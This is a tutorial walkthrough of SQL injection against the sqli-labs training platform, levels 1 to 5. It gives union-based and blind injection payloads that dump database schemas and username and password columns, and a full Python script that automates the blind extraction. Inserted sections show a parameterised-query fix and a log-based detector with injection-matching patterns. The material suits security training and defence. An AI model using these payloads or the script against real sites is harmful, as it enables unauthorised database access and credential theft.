
Unlocking SQL Injection Skills (1)

Basic SQL injection workflow

1) First request normal data, e.g. ?id=1

2) Determine whether an injection point exists, e.g. ?id=1 followed by ['], [and 1=1] or [and 1=2]

3) Determine the field length (number of columns), e.g. ?id=1 followed by ['] and [order by 1 (any number)]: id=1' order by 1=1 # , id=1' order by 1=2 #

4) Determine which columns are echoed back to the page, e.g. ?id=1 followed by ['] and [union select 1,2,3,4,5,6,7,8,9,10,11#]

5) Determine database information
Use built-in functions to dump database information:
version() the server version; database() the current database; user() the current user;
Dump database information without first guessing the usable columns (does not work on some sites):
and 1=2 union all select version()
and 1=2 union all select database()
and 1=2 union all select user()
Operating system information: and 1=2 union all select @@global.version_compile_os from mysql.user
Database privileges:
and ord(mid(user(),1,1))=114 returns normally, the user is root (114 is the ASCII code of 'r')

6) Find the database names
MySQL 5 and later ship the built-in database information_schema, which stores the structure of every database and table on the server: union select schema_name from information_schema.schemata (the statement goes into a displayed column)

7) Find the table names
union select group_concat(table_name) from information_schema.tables where table_schema=database()

8) Find the column names
union select group_concat(column_name) from information_schema.columns where table_name='users' --+

9) Fetch the values
union select group_concat(username,password) from users--+
or 1' union select 1,(select column_name from table_name),3,4#

10) Find all columns of a table and their values
and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=<table name in hex> limit 0,1

Determining whether an injection point exists
?id=100' returns an error: injection may be possible
?id=100 and 1=1 returns normally
?id=100 and 1=2 returns an error
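To see why the and 1=1 / and 1=2 probe above gives a usable signal, and how a parameterised query removes it, here is an added example that is not part of the original post. It uses Python's sqlite3 as a stand-in for the lab's MySQL/MariaDB backend; the users table, its rows and the function names are constructed for this example.

```python
import sqlite3

def make_db():
    # Constructed sample table standing in for the lab's "users" table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "pw-1"), (2, "bob", "pw-2"), (3, "carol", "pw-3")])
    return conn

def lookup_unsafe(conn, id_param):
    # Numeric-context string concatenation: the shape of the vulnerable query.
    # Whatever arrives in id_param becomes part of the SQL text.
    sql = "SELECT username FROM users WHERE id=%s LIMIT 1" % id_param
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.OperationalError as e:
        # A stray quote breaks the statement; this is the "returns an error" case.
        return "error: %s" % e

def lookup_safe(conn, id_param):
    # Hardened: validate the type first, then bind the value as a parameter so the
    # database engine never interprets it as SQL.
    try:
        id_value = int(id_param)
    except ValueError:
        return []
    rows = conn.execute("SELECT username FROM users WHERE id=? LIMIT 1", (id_value,))
    return [row[0] for row in rows]

def probe_differs(lookup, conn):
    """The injection-point test from the workflow: do 'and 1=1' and 'and 1=2'
    produce different pages? True means the attacker-controlled value reached
    the SQL parser; False means the two probes are indistinguishable."""
    true_case = lookup(conn, "1 and 1=1")
    false_case = lookup(conn, "1 and 1=2")
    return true_case != false_case

if __name__ == "__main__":
    conn = make_db()
    for name, fn in (("unsafe", lookup_unsafe), ("safe", lookup_safe)):
        print(name, "probe differs:", probe_differs(fn, conn),
              "| id=1':", fn(conn, "1'"))
```

Against the concatenating version the three probes from the workflow (1', and 1=1, and 1=2) yield error, normal page and empty page respectively, which is exactly the signal the later levels rely on; against the parameterised version every malformed id collapses into the same empty result, so there is nothing to distinguish.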

Getting started, CXK-style

Platform: sqli-labs

Tools: Firefox, HackBar

LV1

As its name suggests, level 1 is an error-based single-quote string injection (the reasoning is given below).

  1. Append ?id=1 to the URL and the page renders normally. Add a ' and the page reports the error "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1", so this is a single-quote injection; after commenting out the rest with --+ the page renders normally again.
  2. Use order by to determine the column count: order by 4 errors and order by 3 renders normally, so there are 3 columns.
  3. Use ?id=0' union select 1,2,group_concat(schema_name) from information_schema.schemata --+ to find the database names (id must be a value that does not exist, so the first query returns nothing and only the result of the second query is displayed).
  4. Use ?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+ to list the table names.
  5. ?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+ lists the column names.
  6. Use ?id=0' union select 1,group_concat(username),group_concat(password) from security.users--+ to dump username and password.

LV2

  1. Append ?id=1 to the URL and the page renders normally. Add a ' and the page reports the error "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '' LIMIT 0,1' at line 1", which tells us the SQL statement contains no single quotes and queries by the bare number. (Alternatively, ?id=2-1 gives the same result as ?id=1.)
  2. Repeat the level 1 steps, dropping the single quote and the comment; everything else stays the same. Payload: id=0 union select 1,group_concat(username),group_concat(password) from security.users

LV3

  1. Append ?id=1 to the URL and the page renders normally. Add a ' and the page reports the error "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'') LIMIT 0,1' at line 1"; after adding )--+ it renders normally.
  2. Same as level 1, just add ) after the quote: ?id=0') union select 1,group_concat(username),group_concat(password) from security.users--+

LV4

Append ?id=1 to the URL and the page renders normally. Adding ' produces no error, but adding " gives the error "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1"; after adding )--+ it renders normally.

Same as level 1, just add ) after the double quote: ?id=0") union select 1,group_concat(username),group_concat(password) from security.users--+

LV5

  1. ?id=1 shows "You are in…". Entering ' gives the error "You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1"; after commenting the rest out it shows You are in… again.
  2. Trying the earlier injection methods, you find the injected data is no longer displayed. If the injection succeeds the page returns You are in…, and if it fails that string is absent, so this is a case for blind injection.
  3. ?id=1' and left(version(),1)=5 %23 checks the version
  4. ?id=1' and length(database())=8 %23 determines the length of the database name
  5. Guess the database name, starting from the first character:
    1> Guess character 1
    ?id=1' and left(database(),1)>'a' %23
    returns normally
    ?id=1' and left(database(),1)>'z' %23
    returns an error
    so the first character lies between a and z
    ?id=1' and left(database(),1)>'s' %23
    returns correctly
    so the first character is s
    2> Guess character 2
    ?id=1' and left(database(),2)>'sa' %23
    returns normally
    ?id=1' and left(database(),2)>'sz' %23
    returns an error
    so the second character lies between a and z
    ?id=1' and left(database(),2)>'se' %23
    returns correctly
    so the second character is e
    Continue in the same way up to the 8th character: the database is security
  6. Guess the tables in the database (security):
    ?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema = database() limit a,1),b,1))>n
    Where:
    a is the table index counted from 0, b is the character position, and n is the decimal ASCII code
  7. Guess the users:
    ?id=1' and ord(mid((select ifnull(cast(username as char),0x20) from S.M order by id limit A,1),B,1))=N %23
    Where S is the database name, M the table name, A the user index, B the character position, and N the decimal ASCII code.
  8. Guess users and passwords:
    ?id=1' and ord(mid((select ifnull(cast(username as char),0x20) from S.M order by id limit A,1),B,1))=N %23
    Where S is the database name, M the table name, A the user index, B the character position, and N the decimal ASCII code.
    Example: ?id=1' and ord(mid((select ifnull(cast(password as char),0x20) from security.users order by id limit 0,1),1,1))=68 %23

The following Python 3 script can be used directly:

import requests

url = 'http://127.0.0.1/sqlilabs/Less-5/?id=1'
db_length = 0
db_name = ''
table_num = 0
table_len = 0
table_name = ''
table_list = []
column_num = 0
column_len = 0
column_name = ''
column_list = []
dump_num = 0
dump_len = 0
dump_name = ''
dump_list = []
i = j = k = 0

### Length of the current database name ###
for i in range(1,20):
    db_payload = '''' and (length(database())=%d)--+''' %i
    # print(url+db_payload)
    r = requests.get(url+db_payload)
    if "You are in" in r.text:
        db_length = i
        print('当前数据库名长度为:%d' % db_length)
        break

### Current database name ###
print('开始猜解数据库名......')
for i in range(1,db_length+1):
    for j in range(95,123):
        db_payload = '''' and (left(database(),%d)='%s')--+''' % (i,db_name+chr(j))
        r = requests.get(url+db_payload)
        if "You are in" in r.text:
            db_name += chr(j)
            # print(db_name)
            break
print('数据库名:\n[+]',db_name)

### Number of tables in the current database ###
for i in range(100):
    db_payload = '''' and %d=(select count(table_name) from information_schema.tables where table_schema='%s')--+''' % (i,db_name)
    r = requests.get(url+db_payload)
    # print(url+db_payload)
    if "You are in" in r.text:
        table_num = i
        break
print('一共有%d张表' % table_num)
print('开始猜解表名......')

### Name length and name of each table ###
for i in range(table_num):
    table_len = 0
    table_name = ''
    #### Table name length ####
    for j in range(1,21):
        db_payload = '''' and ascii(substr((select table_name from information_schema.tables where table_schema="security" limit %d,1),%d,1))--+''' % (i,j)
        r = requests.get(url+db_payload)
        # print(db_payload)
        if "You are in" not in r.text:
            table_len = j-1
            #### Guess the table name ####
            for k in range(1,table_len+1):
                for l in range(95,123):
                    db_payload = '''' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit %d,1),%d,1))=%d--+''' % (i,k,l)
                    # print(db_payload)
                    r = requests.get(url+db_payload)
                    # print(db_payload)
                    if "You are in" in r.text:
                        table_name += chr(l)
            print(table_name)
            table_list.append(table_name)
            break
print('表名:',table_list)

### Column count, column names and column name lengths for each table ###
for i in table_list:
    #### Column count of each table ####
    for j in range(100):
        db_payload = '''' and %d=(select count(column_name) from information_schema.columns where table_name='%s')--+''' % (j, i)
        r = requests.get(url + db_payload)
        if "You are in" in r.text:
            column_num = j
            print(("[+] 表名:%-10s\t" % i) + str(column_num) + '字段')
            break

#### Guess the column name lengths ####
column_num = 3
print('%s表中的列名:' % table_list[-1])
for j in range(3):
    column_name = ''
    for k in range(1,21):
        db_payload = '''' and ascii(substr((select column_name from information_schema.columns where table_name="%s" limit %d,1),%d,1))--+''' % (table_list[-1],j,k)
        r = requests.get(url+db_payload)
        if "You are in" not in r.text:
            column_len = k-1
            # print(column_len)
            break
        #### Guess the column name ####
        for l in range(95,123):
            db_payload = '''' and ascii(substr((select column_name from information_schema.columns where table_name="%s" limit %d,1),%d,1))=%d--+''' % (table_list[-1],j,k,l)
            r = requests.get(url + db_payload)
            if "You are in" in r.text:
                column_name += chr(l)
    print('[+] ',column_name)
    column_list.append(column_name)

print('开始爆破以下字段:',column_list[1:])
for column in column_list[1:]:
    print(column,':')
    dump_num = 0
    for i in range(30):
        db_payload = '''' and %d=(select count(%s) from %s.%s)--+''' % (i,column,db_name,table_list[-1])
        # print(db_payload)
        r = requests.get(url+db_payload)
        if "You are in" in r.text:
            dump_num = i
            # print(i)
            break
    for i in range(dump_num):
        dump_len = 0
        dump_name = ''
        #### Value length ####
        for j in range(1, 21):
            db_payload = '''' and ascii(substr((select %s from %s.%s limit %d,1),%d,1))--+''' % (column,db_name,table_list[-1],i,j)
            r = requests.get(url + db_payload)
            if "You are in" not in r.text:
                dump_len = j-1
                for k in range(1, dump_len + 1):
                    for l in range(1,256):
                        db_payload = '''' and ascii(substr((select %s from %s.%s limit %d,1),%d,1))=%d--+''' % (column,db_name,table_list[-1],i,k,l)
                        # print(db_payload)
                        r = requests.get(url+db_payload)
                        if "You are in" in r.text:
                            dump_name += chr(l)
                            # print(dump_name)
                            break
                break
        print('[+]',dump_name)
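For the defending side: a blind-injection run like LV5, whether typed by hand or driven by the script, leaves a distinctive trail in the web server's access log, namely a burst of requests from one client whose query strings carry comparison functions, information_schema references and trailing comment terminators. The following added example is not part of the original post. It parses a few constructed combined-format log lines modelled on the LV1 and LV5 requests, tags each request with the indicators it matches, and flags clients with repeated hits. The log lines, pattern names and threshold are constructed for this example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format). The first client walks
# through the LV1 steps, the second issues LV5-style blind probes, the third is benign.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /sqlilabs/Less-1/?id=1 HTTP/1.1" 200 812
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /sqlilabs/Less-1/?id=1' HTTP/1.1" 200 905
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /sqlilabs/Less-1/?id=1'%20order%20by%204--+ HTTP/1.1" 200 901
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /sqlilabs/Less-1/?id=0'%20union%20select%201,2,group_concat(schema_name)%20from%20information_schema.schemata%20--+ HTTP/1.1" 200 850
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /sqlilabs/Less-5/?id=1'%20and%20(length(database())=8)--+ HTTP/1.1" 200 700
10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /sqlilabs/Less-5/?id=1'%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))=101--+ HTTP/1.1" 200 700
10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /sqlilabs/Less-5/?id=1'%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))=102--+ HTTP/1.1" 200 700
192.168.1.20 - - [01/Jan/2024:10:00:07 +0000] "GET /sqlilabs/Less-1/?id=2 HTTP/1.1" 200 812
192.168.1.20 - - [01/Jan/2024:10:00:08 +0000] "GET /index.php?page=order%20history HTTP/1.1" 200 2048
"""

# Combined log format: client, identd, user, [timestamp], "METHOD path PROTO", status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\d+)')

# Indicator names are constructed for this example; each mirrors one step of the workflow.
PATTERNS = {
    # quote/terminator probe: id=1' or id=1"
    "quote_probe":   re.compile(r"=\d+\s*['\"]"),
    # boolean probe: and 1=1 / and 1=2
    "boolean_probe": re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),
    # column-count probe: order by N
    "order_by":      re.compile(r"\border\s+by\s+\d+", re.I),
    # union-based extraction
    "union_select":  re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    # metadata read from information_schema
    "schema_read":   re.compile(r"\binformation_schema\.", re.I),
    # blind character/length oracle: ascii(substr((select ...)), left(database(),...)
    "blind_oracle":  re.compile(r"\b(ascii|ord|length|left|substr|mid)\s*\(.*\b(database|version|user|select)\b", re.I),
    # trailing SQL comment swallowing the rest of the original query ("--+" decodes to "-- ", "%23" to "#")
    "comment_tail":  re.compile(r"(--|#)\s*$"),
}

def classify_request(path):
    """Return the indicator names matching the URL-decoded query string of a request path."""
    if "?" not in path:
        return []
    query = unquote_plus(path.split("?", 1)[1])
    return [name for name, rx in PATTERNS.items() if rx.search(query)]

def analyze_log(text, blind_threshold=3):
    """Return (hits, suspects): hits is a list of (ip, path, indicators) for flagged
    requests; suspects maps each client with >= blind_threshold flagged requests to its
    count. Blind injection needs many near-identical probes, so the count is the signal."""
    hits = []
    per_ip = Counter()
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        indicators = classify_request(m["path"])
        if indicators:
            hits.append((m["ip"], m["path"], indicators))
            per_ip[m["ip"]] += 1
    suspects = {ip: n for ip, n in per_ip.items() if n >= blind_threshold}
    return hits, suspects

if __name__ == "__main__":
    hits, suspects = analyze_log(SAMPLE_LOG)
    for ip, path, indicators in hits:
        print(ip, ",".join(indicators), path, sep="\t")
    print("clients over threshold:", suspects)
```

In production this runs over the real log or a SIEM export rather than an embedded string; the regexes are deliberately narrow so that ordinary parameters such as page=order history do not trip them, and the per-client count matters more than any single match, since one stray quote is noise but hundreds of ascii(substr(...)) comparisons from one address is an extraction in progress.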

This is getting long, so the rest will follow in the next update...

Stay tuned :-)
